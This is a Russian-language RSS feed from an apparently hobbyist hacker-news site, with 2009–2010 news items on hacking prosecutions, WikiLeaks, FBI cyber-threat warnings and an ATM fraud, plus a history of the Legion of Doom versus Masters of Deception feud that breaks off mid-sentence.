<?xml version="1.0" encoding="UTF-8" ?>
<rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<title>Сайт города Ядрина !</title>
		<link>http://xakerd.ucoz.ru/</link>
		<description></description>
		<lastBuildDate>Thu, 24 Jun 2010 08:22:45 GMT</lastBuildDate>
		<generator>uCoz Web-Service</generator>
		<atom:link href="https://xakerd.ucoz.ru/news/rss" rel="self" type="application/rss+xml" />
		
		<item>
			<title>Накликался:Хакер приговорен к крупному штрафу</title>
			<description>&lt;a href=&quot;http://www.rg.ru/tema/avtor-Tatiana-Ermoshkina/index.html&quot; class=&quot;bodyArticleText&quot;&gt;Татьяна Ермошкина&lt;/a&gt;
 

&lt;!-- /authors-links-x.ihtml --&gt;

 &lt;!-- /Секция авторов --&gt;

 &lt;!-- Секция &quot;где опубликовано&quot; --&gt;
&lt;p class=&quot;Author&quot; style=&quot;margin-top: 10px;&quot;&gt;
 
 &lt;a href=&quot;http://www.rg.ru/gazeta/rg/2010/06/22.html&quot;&gt;
 
 &quot;Российская газета&quot; - Федеральный выпуск
 
 №5213
 
 
 (134)
 
 
 от 22&amp;nbsp;июня 2010&amp;nbsp;г.&lt;/a&gt;&lt;br&gt;
 &lt;a href=&quot;http://www.rg.ru/printable/2010/06/22/haker.html&quot; target=&quot;_blank&quot;&gt;Версия для печати&amp;nbsp;/&amp;nbsp;сохранить материал&lt;/a&gt;&lt;/p&gt;
 &lt;!-- /Секция &quot;где опубликовано&quot; --&gt;





 
 &lt;!-- LEAD WRAPS PICTURE --&gt;
 
&lt;!-- &lt;p&gt;--&gt;
 
 
 &lt;!-- article-img-2.ihtml --&gt;
&lt;table style=&quot;float: left; clear: left;&quot; border=&quot;0&quot; cellspacing=&quot;5&quot; width=&quot;&quot;&gt;

&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;!--_tmpl_include name=&apos;article-right-toplinks.ihtml&apos;--&gt;

&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;

&lt;!-- /article-img-2.ihtml --&gt;
 
 
 
 
&lt;!-- &lt;/p&gt;--&gt;
 
 &lt;!-- /LEAD WRAPS PICTURE --&gt;

 &lt;!-- LEAD AT THE RIGHT --&gt;
 
 &lt;!-- /LEAD AT THE RIGHT -...</description>
			<content:encoded>&lt;a href=&quot;http://www.rg.ru/tema/avtor-Tatiana-Ermoshkina/index.html&quot; class=&quot;bodyArticleText&quot;&gt;Татьяна Ермошкина&lt;/a&gt;
 

&lt;!-- /authors-links-x.ihtml --&gt;

 &lt;!-- /Секция авторов --&gt;

 &lt;!-- Секция &quot;где опубликовано&quot; --&gt;
&lt;p class=&quot;Author&quot; style=&quot;margin-top: 10px;&quot;&gt;
 
 &lt;a href=&quot;http://www.rg.ru/gazeta/rg/2010/06/22.html&quot;&gt;
 
 &quot;Российская газета&quot; - Федеральный выпуск
 
 №5213
 
 
 (134)
 
 
 от 22&amp;nbsp;июня 2010&amp;nbsp;г.&lt;/a&gt;&lt;br&gt;
 &lt;a href=&quot;http://www.rg.ru/printable/2010/06/22/haker.html&quot; target=&quot;_blank&quot;&gt;Версия для печати&amp;nbsp;/&amp;nbsp;сохранить материал&lt;/a&gt;&lt;/p&gt;
 &lt;!-- /Секция &quot;где опубликовано&quot; --&gt;





 
 &lt;!-- LEAD WRAPS PICTURE --&gt;
 
&lt;!-- &lt;p&gt;--&gt;
 
 
 &lt;!-- article-img-2.ihtml --&gt;
&lt;table style=&quot;float: left; clear: left;&quot; border=&quot;0&quot; cellspacing=&quot;5&quot; width=&quot;&quot;&gt;

&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;!--_tmpl_include name=&apos;article-right-toplinks.ihtml&apos;--&gt;

&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;

&lt;!-- /article-img-2.ihtml --&gt;
 
 
 
 
&lt;!-- &lt;/p&gt;--&gt;
 
 &lt;!-- /LEAD WRAPS PICTURE --&gt;

 &lt;!-- LEAD AT THE RIGHT --&gt;
 
 &lt;!-- /LEAD AT THE RIGHT --&gt;

 &lt;!-- LEAD UNDER THE PICTURE --&gt;
 
 &lt;!-- /LEAD UNDER THE PICTURE --&gt;



 &lt;!-- TEXT --&gt;
 &lt;p&gt;&lt;i&gt;Суд Сормовского района Нижнего Новгорода приговорил хакера, 
разместившего в Интернете непристойные предложения от имени своей 
знакомой, к выплате штрафа в размере 240 тысяч рублей.&lt;/i&gt;&lt;/p&gt;
&lt;p&gt;Из этой суммы 200 тысяч рублей получит жертва &quot;пирата&quot; в качестве 
компенсации морального ущерба. По мнению самой девушки, подсудимый 
взломал ее страничку в &quot;Одноклассниках&quot;, обидевшись на то, что она 
удалила его из списка &quot;друзей&quot;. Решив отомстить, он украл и поменял 
пароли от ее электронного почтового ящика и анкеты на сайте. В 
результате девушка не могла попасть на свою страницу. Злоумышленник тем 
временем вступал от ее имени в эротическую переписку с мужчинами, а 
также размещал фотографии порнографического содержания.&lt;/p&gt;
&lt;p&gt;Суд счел его виновным по статьям &quot;Неправомерный доступ к компьютерной
 информации&quot; и &quot;Нарушение тайны переписки&quot;. И приговорил к штрафу в 
размере 240 тысяч рублей.&lt;/p&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/naklikalsja_khaker_prigovoren_k_krupnomu_shtrafu/2010-06-24-44</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/naklikalsja_khaker_prigovoren_k_krupnomu_shtrafu/2010-06-24-44</guid>
			<pubDate>Thu, 24 Jun 2010 08:22:45 GMT</pubDate>
		</item>
		<item>
			<title>Пентагон разыскивает автора WikiLeaks</title>
			<description>&lt;img alt=&quot;&quot; src=&quot;https://xakerd.ucoz.ru/246445695.jpg&quot;&gt;&lt;div class=&quot;body&quot;&gt;&lt;div class=&quot;infographics_image&quot;&gt;&lt;p&gt;&lt;strong&gt;МОСКВА, 11 
июня - РИА Новости, Илья Илембитов.&lt;/strong&gt; Пентагон разыскивает 
некоего Джулиана Эссенджа (Julian Assange), создателя сайта &lt;a href=&quot;http://www.wikileaks.org/&quot; target=&quot;_blank&quot;&gt;WikiLeaks&lt;/a&gt; – 
ресурса, публикующего информацию, ставшую доступной вследствие утечки 
данных из государственных структур. Службы госбезопасности США 
опасаются, что в ближайшее время скандальный сайт опубликует большое 
количество секретной информации.&lt;/p&gt;
&lt;p&gt;Издание &lt;a href=&quot;http://www.thedailybeast.com/&quot; target=&quot;_blank&quot;&gt;The 
Daily Beast&lt;/a&gt; сообщает со ссылкой на представителей власти, что 
Пентагон надеется «выяснить местонахождение Джулиана Эссенджа, имеющего 
австралийское гражданство, и склонить его к сотрудничеству».&lt;/p&gt;
&lt;p&gt;Сайт WikiLeaks был открыт в декабре 2006 года с целью публикации 
утечки секретных материалов различного характера, и к настоящему времени
 приобрел скандальную известность.&lt;/p...</description>
			<content:encoded>&lt;img alt=&quot;&quot; src=&quot;https://xakerd.ucoz.ru/246445695.jpg&quot;&gt;&lt;div class=&quot;body&quot;&gt;&lt;div class=&quot;infographics_image&quot;&gt;&lt;p&gt;&lt;strong&gt;МОСКВА, 11 
июня - РИА Новости, Илья Илембитов.&lt;/strong&gt; Пентагон разыскивает 
некоего Джулиана Эссенджа (Julian Assange), создателя сайта &lt;a href=&quot;http://www.wikileaks.org/&quot; target=&quot;_blank&quot;&gt;WikiLeaks&lt;/a&gt; – 
ресурса, публикующего информацию, ставшую доступной вследствие утечки 
данных из государственных структур. Службы госбезопасности США 
опасаются, что в ближайшее время скандальный сайт опубликует большое 
количество секретной информации.&lt;/p&gt;
&lt;p&gt;Издание &lt;a href=&quot;http://www.thedailybeast.com/&quot; target=&quot;_blank&quot;&gt;The 
Daily Beast&lt;/a&gt; сообщает со ссылкой на представителей власти, что 
Пентагон надеется «выяснить местонахождение Джулиана Эссенджа, имеющего 
австралийское гражданство, и склонить его к сотрудничеству».&lt;/p&gt;
&lt;p&gt;Сайт WikiLeaks был открыт в декабре 2006 года с целью публикации 
утечки секретных материалов различного характера, и к настоящему времени
 приобрел скандальную известность.&lt;/p&gt;
&lt;p&gt;В данный момент в США под следствием находится аналитик разведки 
армии США Брэдли Мэннинг (Bradley Manning). Он обвиняется в том, что 
предоставлял WikiLeaks секретную информацию. Мэннинг уже признал, что 
передал WikiLeaks видео, запечатлевшее атаку вертолета армии США в 
Багдаде в 2007 году, в результате которой погибли 12 человек, включая 
двух журналистов Reuters.&lt;/p&gt;
&lt;p&gt;Администрация WikiLeaks не подтверждает факт передачи какой-либо 
информации Мэннингом, но выражает готовность оказать ему юридическую 
помощь в случае, если дело будет рассматриваться в суде.&lt;/p&gt;
&lt;p&gt;Представители Пентагона не сообщают, известно ли им что-либо о 
местонахождении Джулиана Эссенджа.&lt;/p&gt;
&lt;p&gt;Владельцы WikiLeaks прикладывают немало усилий для того, чтобы 
обезопасить ресурс. Они используют несколько серверов по всему миру для 
дублирования информации. Таким образом, отдельно взятое государство не 
может воспрепятствовать работе сайта.&lt;/p&gt;&lt;/div&gt;&lt;/div&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/pentagon_razyskivaet_avtora_wikileaks/2010-06-24-43</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/pentagon_razyskivaet_avtora_wikileaks/2010-06-24-43</guid>
			<pubDate>Thu, 24 Jun 2010 08:17:53 GMT</pubDate>
		</item>
		<item>
			<title>ФБР: террористы готовятся к кибератакам на США</title>
			<description>Террористические группировки, иностранные государства и криминальные организации создают растущую угрозу для безопасности США, так как могут атаковать правительственные и частные компьютерные сети страны. Об этом во время своего выступления на конференции, посвященной интернет-безопасности, заявил Роберт Мюллер, глава ФБР, сообщает Reuters.&lt;BR&gt;&lt;BR&gt;Он отметил, что сейчас террористические группы, такие как Аль-Каида, используют Сеть не только для поиска новых членов и планирования терактов. По словам Мюллера, кибератака может нанести не меньший вред, чем установленная в правильном месте бомба.&lt;BR&gt;&lt;BR&gt;Мюллер заявил, что также угрожают безопасности США правительства некоторых стран, стремительно наращивая свои ресурсы для интернет-шпионажа. О каких именно странах шла речь, глава ФБР не уточнил. &quot;Террористы демонстрируют очевидный интерес к росту своих навыков в сфере кибератак - они либо обучают собственных сотрудников, либо нанимают сторонних специалистов. Делается это для объединения реа...</description>
			<content:encoded>Террористические группировки, иностранные государства и криминальные организации создают растущую угрозу для безопасности США, так как могут атаковать правительственные и частные компьютерные сети страны. Об этом во время своего выступления на конференции, посвященной интернет-безопасности, заявил Роберт Мюллер, глава ФБР, сообщает Reuters.&lt;BR&gt;&lt;BR&gt;Он отметил, что сейчас террористические группы, такие как Аль-Каида, используют Сеть не только для поиска новых членов и планирования терактов. По словам Мюллера, кибератака может нанести не меньший вред, чем установленная в правильном месте бомба.&lt;BR&gt;&lt;BR&gt;Мюллер заявил, что также угрожают безопасности США правительства некоторых стран, стремительно наращивая свои ресурсы для интернет-шпионажа. О каких именно странах шла речь, глава ФБР не уточнил. &quot;Террористы демонстрируют очевидный интерес к росту своих навыков в сфере кибератак - они либо обучают собственных сотрудников, либо нанимают сторонних специалистов. Делается это для объединения реальных терактов с атаками в киберпространстве. Наряду с террористами, некоторые государства также могут использовать интернет в качестве зоны ведения боевых действий по политическим причинам&quot;, - сказал Роберт Мюллер. &lt;BR&gt;&lt;BR&gt;По его мнению, американским государственным сетям угрожают как хакеры на службе у государств или наемники, так и хакеры-одиночки или международные криминальные синдикаты, преследующие собственные цели. &quot;Они стремятся завладеть нашими технологиями, нашими разведданными, нашей интеллектуальной собственностью и даже нашими стратегическими планами&quot;, - считает директор ФБР.&lt;BR&gt;&lt;BR&gt;Разговоры об угрозе кибератак особенно активизировались в США после сообщения об атаках на компанию Google и еще около 100 различных ИТ-компаний. Напомним, что Google сообщил об атаках на свой сервис электронной почты Gmail во вторник, 12 января. Атака, по данным интернет-гиганта, велась с территории Китая. Целью хакеров якобы был сбор личной информации о десятках активистов различных групп по борьбе за права человека в Китае.&lt;BR&gt;&lt;BR&gt;Мюллер подчеркнул, что международное сотрудничество является критически важным фактором для борьбы с киберпреступностью. Сейчас у ФБР есть около 60 представительств по всему миру, которые сотрудничают с властями разных стран.&lt;BR&gt;&lt;BR&gt;Недавно правительство США рассекретило ряд своих инициатив по охране государственных сетей в рамках стратегии по продвижению глобальной интернет-свободы. Программы, о которых идет речь, были приняты в 2008 г. еще во время правления администрации президента Буша. Они включают в себя планы по созданию межведомственной контрразведки в киберпространстве, а также мероприятия по повышению уровня безопасности в правительственных компьютерных сетях, меры по обнаружению и предотвращению вторжений в государственные информационные системы, и проведение исследований в сфере информационной безопасности.&lt;BR&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/fbr_terroristy_gotovjatsja_k_kiberatakam_na_ssha/2010-03-07-42</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/fbr_terroristy_gotovjatsja_k_kiberatakam_na_ssha/2010-03-07-42</guid>
			<pubDate>Sun, 07 Mar 2010 17:22:52 GMT</pubDate>
		</item>
		<item>
			<title>Беспрецедентное преступление в Башкортостане</title>
			<description>&lt;P&gt;&lt;/P&gt;&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/2100992.jpg&quot;&gt;Беспрецедентное преступление в Башкортостане: в крупном уфимском супермаркете злоумышленники обворовали банкомат, причем, совершенно необыкновенным способом.&lt;BR&gt;&lt;BR&gt;Использовав клиентскую клавиатуру и сервисный код, они установили собственный курс американской валюты в банкомате, повысив его до 1500 рублей. Засовывая в банкомат по одной купюре, они обменяли 800 долларов США на 1,2 миллиона рублей.&lt;BR&gt;&lt;BR&gt;- По данному факту еще в декабре было возбуждено уголовное дело по статье 159 часть 4 УК РФ, - мошенничество, совершенное организованной группой в особо крупном размере, - сообщил старший помощник прокурора Уфы Дим Абдуллин. - В настоящее время ведется розыск подозреваемых.&lt;BR&gt;&lt;BR&gt;Как стало известно корреспонденту &quot;РГ&quot; из компетентных источников в правоохранительных органах, несмотря на то, что преступников засняли видеокамеры в супермаркете, их розыск почти месяц не давал результата, и лишь вчера один из трех &quot;хакеров&quot; был задержан. Теперь он дает пок...</description>
			<content:encoded>&lt;P&gt;&lt;/P&gt;&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/2100992.jpg&quot;&gt;Беспрецедентное преступление в Башкортостане: в крупном уфимском супермаркете злоумышленники обворовали банкомат, причем, совершенно необыкновенным способом.&lt;BR&gt;&lt;BR&gt;Использовав клиентскую клавиатуру и сервисный код, они установили собственный курс американской валюты в банкомате, повысив его до 1500 рублей. Засовывая в банкомат по одной купюре, они обменяли 800 долларов США на 1,2 миллиона рублей.&lt;BR&gt;&lt;BR&gt;- По данному факту еще в декабре было возбуждено уголовное дело по статье 159 часть 4 УК РФ, - мошенничество, совершенное организованной группой в особо крупном размере, - сообщил старший помощник прокурора Уфы Дим Абдуллин. - В настоящее время ведется розыск подозреваемых.&lt;BR&gt;&lt;BR&gt;Как стало известно корреспонденту &quot;РГ&quot; из компетентных источников в правоохранительных органах, несмотря на то, что преступников засняли видеокамеры в супермаркете, их розыск почти месяц не давал результата, и лишь вчера один из трех &quot;хакеров&quot; был задержан. Теперь он дает показания. В частности, следствие очень интересует, где его подельники, и как им удалось взломать сервисный код. Подозреваемым грозит лишение свободы на срок от пяти до десяти лет со штрафом в размере до одного миллиона рублей.&lt;BR&gt;&lt;/P&gt;&lt;P&gt;&lt;BR&gt;&lt;BR&gt;&lt;/P&gt;</content:encoded>
			<link>https://xakerd.ucoz.ru/news/2009-02-19-41</link>
			<dc:creator>xakerd</dc:creator>
			<guid>https://xakerd.ucoz.ru/news/2009-02-19-41</guid>
			<pubDate>Thu, 19 Feb 2009 08:54:45 GMT</pubDate>
		</item>
		<item>
			<title>История компьютерного андеграунда::Legion of Doom vs Masters of Deception - великая хакерская война</title>
			<description>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/1142286766_hacker.jpg&quot;&gt;Самая известная, самая многочисленная и самая авторитетная - на &lt;BR&gt;протяжение 80-х гг. группа Legion of Doom была идолом компьютерного &lt;BR&gt;андеграунда. Членство в LoD однозначно говорило о высокой &lt;BR&gt;квалификации и как минимум вызывало уважение. &lt;BR&gt;Хакеры из Legion of Doom вполне могли учинить хаос в любой &lt;BR&gt;коммерческой компании, но главным правилом в группе было следование &lt;BR&gt;хакерской этике. Каждый мембер специализировался в какой-то области, &lt;BR&gt;а постоянное комбинирование талантов делало группу еще сильнее. До &lt;BR&gt;конца 80-х она была номером один на просторах компьютерного &lt;BR&gt;андеграунда, но вскоре нашлась команда, которая кинула вызов &lt;BR&gt;могущественной LoD. События, произошедшие после этого, вошли в &lt;BR&gt;историю как: &quot;Великая хакерская война&quot;. &lt;BR&gt;Legion of Doom&lt;BR&gt;Хакерская группа Knights of Shadow в 1984 г. включала в себя только &lt;BR&gt;известных личностей. Если ты не успел прославиться на олимпе &lt;BR&gt;андеграунда, какими бы знаниями ты не...</description>
			<content:encoded>&lt;P&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/1142286766_hacker.jpg&quot;&gt;Самая известная, самая многочисленная и самая авторитетная - на &lt;BR&gt;протяжение 80-х гг. группа Legion of Doom была идолом компьютерного &lt;BR&gt;андеграунда. Членство в LoD однозначно говорило о высокой &lt;BR&gt;квалификации и как минимум вызывало уважение. &lt;BR&gt;Хакеры из Legion of Doom вполне могли учинить хаос в любой &lt;BR&gt;коммерческой компании, но главным правилом в группе было следование &lt;BR&gt;хакерской этике. Каждый мембер специализировался в какой-то области, &lt;BR&gt;а постоянное комбинирование талантов делало группу еще сильнее. До &lt;BR&gt;конца 80-х она была номером один на просторах компьютерного &lt;BR&gt;андеграунда, но вскоре нашлась команда, которая кинула вызов &lt;BR&gt;могущественной LoD. События, произошедшие после этого, вошли в &lt;BR&gt;историю как: &quot;Великая хакерская война&quot;. &lt;BR&gt;Legion of Doom&lt;BR&gt;Хакерская группа Knights of Shadow в 1984 г. включала в себя только &lt;BR&gt;известных личностей. Если ты не успел прославиться на олимпе &lt;BR&gt;андеграунда, какими бы знаниями ты не обладал, путь в нее для тебя &lt;BR&gt;был закрыт. Lex Luthor&apos;а знали многие. Несмотря на свой юный &lt;BR&gt;возраст, он уже успел проникнуть в несколько сложных систем и на &lt;BR&gt;фрикерских BBS пользовался авторитетом знающего человека. Поэтому, &lt;BR&gt;когда Lex попросился в KoS - остальные мемберы не стали возражать. &lt;BR&gt;Тусуясь на разных бордах, Lex Luthor познакомился со многими &lt;BR&gt;хакерами. На подобных Plovernet и Osuny досках можно было встретить &lt;BR&gt;специалистов всех мастей. Чтобы расширить общие знания в группе, Lex &lt;BR&gt;предложил парням из KoS зачислить в коллектив несколько его друзей, &lt;BR&gt;имеющих отличную квалификацию. Но, несмотря на все доводы, ему &lt;BR&gt;отказали. У кандидатов действительно имелись хорошие знания, но &lt;BR&gt;звездами они не были, громких подвигов не совершали, так что места &lt;BR&gt;для них не имелось. Такая идеология разозлила Lex&apos;а и он решил &lt;BR&gt;оставить группу, чтобы сформировать свою. Такую, где будут цениться &lt;BR&gt;не сомнительная популярность, а знания и умения человека. &lt;BR&gt;В том же 1984 г. Lex запустил новую BBS&apos;ку Legion of Doom и попутно &lt;BR&gt;принялся сколачивать команду с одноименным названием. Имя группы &lt;BR&gt;взялось не от фонаря - в начале 80-х по телевизору часто крутили &lt;BR&gt;мультсериал &quot;Superfriends&quot;, в котором главный злодей Lex Luthor &lt;BR&gt;возглавлял банду Legion of Doom, всячески строившую козни героям. &lt;BR&gt;Этот антигерой был для своего рода кумиром для хакера. Основной &lt;BR&gt;костяк команды набрался из Plovernet - в то время центровой борды &lt;BR&gt;компьютерного андеграунда. В основном в группу вошли ближайшие &lt;BR&gt;друзья Lex&apos;а плюс несколько просто зарекомендовавших себя ребят. &lt;BR&gt;Первоначальный состав выглядел так: Lex Luthor, Karl Marx, Mark &lt;BR&gt;Tabas, Agrajag the Prolonged, King Blotto, Blue Archer, EBA, The &lt;BR&gt;Dragyn, Unknown Soldier. На протяжение следующих десяти лет он много &lt;BR&gt;раз менялся - одни приходили, другие уходили. В какой то момент &lt;BR&gt;группа разделилась на две: Legion of Doom, которую составляли больше &lt;BR&gt;опытные фрикеры, и Legion of Hackers, члены которой занималисхь &lt;BR&gt;компьютерным взломом. Когда все мемберы стали хакерами две &lt;BR&gt;разрозненные команды соединились в одну - LoD. С 1985 г. ее лидером &lt;BR&gt;стал Erik Bloodaxe (Крис Гогганс), занимавшийся организаторскими &lt;BR&gt;вопросами и в большинстве случаев приводящий новых людей. Судьба &lt;BR&gt;кандидатов решалась путем голосования остальных мемберов. &lt;BR&gt;Благодаря хорошо развитой инфраструктуре, группа принимала активное &lt;BR&gt;участие в развитии компьютерного андеграунда. Члены LoD часто &lt;BR&gt;выпускали security документации, проводилис андеграундовые тусовки, &lt;BR&gt;они же были основным источником новостей хакерского мира. А Legion &lt;BR&gt;of Doom BBS вскоре стала самым большим в мире архивом информации на &lt;BR&gt;хакерскую тематику. Мегабайты текстов хранились на винте борды, но &lt;BR&gt;доступ к ним имели лишь избранные. Несмотря на известность самой &lt;BR&gt;группы, ее хакерская деятельность оставалась в тени. Активные &lt;BR&gt;мемберы избегали публичной славы и обсуждали свои проекты &lt;BR&gt;исключительно в закрытых от посторонних местах. В связи с этим очень &lt;BR&gt;скоро над LoD навис черный ореол. Как только ее не называли, и &lt;BR&gt;&quot;организованная группа кибертеррористов&quot;, и &quot;банда подростков, &lt;BR&gt;сформированная для уничтожения сервиса 911&quot;, и даже &lt;BR&gt;&quot;коммунистическая угроза национальной безопасности&quot;. Если &lt;BR&gt;непослушных маленьких детей родители пугали всякими чудовищами, для &lt;BR&gt;системных администраторов настоящим страхом было стать жертвой &lt;BR&gt;Legion of Doom. Но, несмотря на то, что хакеры LoD на протяжении &lt;BR&gt;80-х проникли в десятки тысяч самых разных систем, практически &lt;BR&gt;всегда посещение мотивировалось лишь исследовательским любопытством. &lt;BR&gt;Взломщики тихо приходили, тихо скачивали интересующую их информацию &lt;BR&gt;и так же тихо уходили, заметая следы. Были и исключения - некоторые &lt;BR&gt;мемберы злоупотребляли своими знаниями и нарушали главное правило: &lt;BR&gt;&quot;Не навреди&quot;. Таких были единицы и LoD старалась избавиться от них &lt;BR&gt;как можно быстрее (например, в конце 1985 г. из группы был изгнан &lt;BR&gt;Terminal Man, который стер в одной из систем важную информацию). &lt;BR&gt;То, что внутри хакерской команды разделялось на &quot;можно&quot; и &quot;нельзя&quot;, &lt;BR&gt;у федералов проходило под однозначной статьей &quot;виновен&quot;, только с &lt;BR&gt;разными сроками. За любовь к исследованиям поплатились многие хакеры &lt;BR&gt;LoD: X-Man, Unknown Soldier, Sharp Razor, The Mentor, Bill from &lt;BR&gt;RNOC, Thomas Covenant, The Prophet, The Leftist, Urvile и другие. &lt;BR&gt;Практически каждый из сорока членов группы, если вовремя не &lt;BR&gt;завязывал со своей деятельностью, рано или поздно оказывался под &lt;BR&gt;колпаком. &lt;BR&gt;&lt;IMG src=&quot;https://xakerd.ucoz.ru/legion_of_doom.gif&quot;&gt;Masters of Deception&lt;BR&gt;В 1989 г., просматривая постинги на фрикерских BBS, Erik Bloodaxe &lt;BR&gt;заметил, что какой-то парень подписывается: &quot;Phiber Optik of the &lt;BR&gt;LoD&quot;. Быстро вычислив номер телефона самозванца, Erik позвонил ему &lt;BR&gt;домой и поинтересовался, какого дьявола тот говорит о своей &lt;BR&gt;причастности к группе. &quot;Потому что я и есть член группы&quot; - спокойно &lt;BR&gt;заметил Phiber Optik (настоящее имя: Mark Abene). Лидер LoD пояснил &lt;BR&gt;Марку, что вступить можно только с разрешения активных мемберов, да &lt;BR&gt;при наличии определенной квалификации. Но, едва разговор зашел за &lt;BR&gt;технические темы, Erik понял, что по уровню знаний этот парень &lt;BR&gt;опережает многих его товарищей. Phiber Optik был экспертом по &lt;BR&gt;телефонным сетям и мог вытворять с ними что угодно. А помимо этого &lt;BR&gt;был опытным хакером. Это при том, что парню едва исполнилось 17 лет. &lt;BR&gt;Конец разговора резко отличался от начала - Erik Bloodaxe пообещал &lt;BR&gt;обсудить кандидатуру Марка со своими друзьями и через несколько дней &lt;BR&gt;Phiber Optik уже официально присоединился к Legion of Doom. &lt;BR&gt;Уже спустя несколько недель некоторые мемберы LoD стали сожалеть о &lt;BR&gt;принятом решении. Оказалось, что у Марка не только неординарные &lt;BR&gt;мозги, но и не абы какое самолюбие вкупе с наглостью. Его сообщения &lt;BR&gt;на форумах были пропитаны бахвальством, а некоторые поступки &lt;BR&gt;компрометировали всю группу. Поэтому не прошло и полгода, как &lt;BR&gt;талантливого новичка попросили вон. &lt;BR&gt;Phiber Optik в 1989 г. уже был достаточно известен, а среди хакеров &lt;BR&gt;Нью-Йорка вообще считался легендарной личностью. Тут у него было &lt;BR&gt;много друзей и, покинув LoD, он стал подумывать над созданием своей &lt;BR&gt;группы. Название предложил Пол Стайра - преуспевающий студент &lt;BR&gt;престижного колледжа, а по совместительству начинающий хакер &lt;BR&gt;Scorpion, с которым Марк познакомился полгода назад. Слово MoD - &lt;BR&gt;было намеком на то, что новая группа хакеров на шаг впереди от LoD. &lt;BR&gt;Собираясь вместе, члены будущей команды Masters of Deception ставили &lt;BR&gt;конкретную цель - потеснить Legion of Doom с пьедестала славы и &lt;BR&gt;обрести титул хакерской группы номер один. Состав группы выглядел &lt;BR&gt;так: Phiber Optik, Scorpion, HAC, The Wing, Acid Phreak, The Seeker, &lt;BR&gt;Lord Micro, Red Knight, Corrupt, Outlaw. &lt;BR&gt;Большинство мемберов MoD особо не заботились о приципах хакерской &lt;BR&gt;этики. Деяний одних только The Wing и Outlaw хватало, чтобы &lt;BR&gt;обеспечить всех пожизненными сроками. Но, если раньше взломщики &lt;BR&gt;направляли свою энергию на беспомощные серверы правительственных и &lt;BR&gt;коммерческих компьютеров, то с начала 1990 г. их новой целью стала &lt;BR&gt;группа Legion of Doom. &lt;BR&gt;Война компьютерных умов&lt;BR&gt;Первые месяцы после рождения Masters of Deception явных стычек между &lt;BR&gt;MoD и LoD не было. Группы нередко пересекались на BBS, кидая друг в &lt;BR&gt;друга разного рода подколки. Все началось с того, что однажды, в &lt;BR&gt;разгар болтовни между шестерыми членами Legion of Doom на закрытой &lt;BR&gt;телеконференции появился чужак. &quot;Yo, dis is Dope Fiend from MoD&quot; - &lt;BR&gt;прозвучал громкий голос, прерывая беседу хакеров на полуслове. В &lt;BR&gt;ответ тут же раздалось: &quot;Выкиньте кто-нибудь этого нигера с линии!&quot;. &lt;BR&gt;Автор заявления не знал, что на самом деле гостем был Corrupt - &lt;BR&gt;единственный чернокожий мембер Masters of Deception, болезненно &lt;BR&gt;воспринимающий любые проявления расизма. И уж тем более &lt;BR&gt;презрительное &quot;нигер&quot; в свою сторону. &lt;BR&gt;Ответный удар не заставил себя долго ждать. Джон Ли (настоящее имя &lt;BR&gt;Corrupt&apos;a) быстро нашел домашний телефон Erik&apos;a Bloodaxe - лидера &lt;BR&gt;LoD - и засыпал его издевательскими посланиями. Телефон в квартире &lt;BR&gt;Криса звонил постоянно, не помогали ни уговоры, ни угрозы, ни &lt;BR&gt;вешанья трубки. Хакер даже не мог понять, зачем и почему его &lt;BR&gt;достают, так как в тот злополучный день не сидел в конференции. &lt;BR&gt;Узнав, что его мучителями являются парни из MoD, Erik Bloodaxe решил &lt;BR&gt;их проучить. В это время как раз в сети появилась написанная Acid &lt;BR&gt;Phreak&apos;ом история о рождении группы. С помощью простенькой &lt;BR&gt;программы, заменяющий буквы на k001 х@цk3r$k13, Крис подредактировал &lt;BR&gt;текст и в новом виде растиражировал его в публичных местах. &lt;BR&gt;Выглядело так, как будто кучка ламеров решила рассказать о своем &lt;BR&gt;величии. Для членов MoD, не ожидавших такого коварства, это был удар &lt;BR&gt;ниже пояса. Открытое объявление войны. &lt;BR&gt;Некогда безобидные подколки на BBS быстро превратились в яростный &lt;BR&gt;флейм. Обвиняя друг друга в ламерстве и прочих грехах, хакеры не &lt;BR&gt;упускали возможности продемонстрировать это на практике. Они &lt;BR&gt;применяли все свои знания и изобретательность, атакуя вражеские &lt;BR&gt;телефоны и компьютеры. То и дело у одного из членов той или иной &lt;BR&gt;группы телефон переводился в режим таксофона, а система давала сбой. &lt;BR&gt;Хранить файлы внутри компьютера стало небезопасно. Как и &lt;BR&gt;разговаривать по телефону - линии постоянно прослушивались. &lt;BR&gt;Идея стать лучшей хакерской группой в этой время еще больше &lt;BR&gt;захлестнула MoD. Команда Phiber Optik&apos;а старалась осуществить как &lt;BR&gt;можно больше крупных взломов, и для поднятия авторитета выбирались &lt;BR&gt;самые сложные системы. Legion of Doom была не в восторге от &lt;BR&gt;происходящего, и просто огрызалась на нападки своих недругов. В то &lt;BR&gt;же время Masters of Deception искала новые изощренные способы им &lt;BR&gt;досадить. Весной 1991 Erik&apos;у Bloodaxe даже пришлось обратиться в &lt;BR&gt;ФБР, так как хакеры MoD поставили на прослушивание закрытую &lt;BR&gt;телефонную линию его security фирмы Comsec. Клиенты вряд ли были бы &lt;BR&gt;в восторге, что security эксперты, которым они доверили свою &lt;BR&gt;безопасность, допустили проникновение в телефонную сеть посторонних. &lt;BR&gt;Но заявление Криса об активности хакерской группы для федералов не &lt;BR&gt;стало неожиданностью. Как оказалось, те уже давно следили за &lt;BR&gt;назойливыми хакерами. Арест всей банды - был делом времени. &lt;BR&gt;Несмотря на многочисленные улики, собранные за несколько месяцев, до &lt;BR&gt;суда дело компьютерных взломщиков 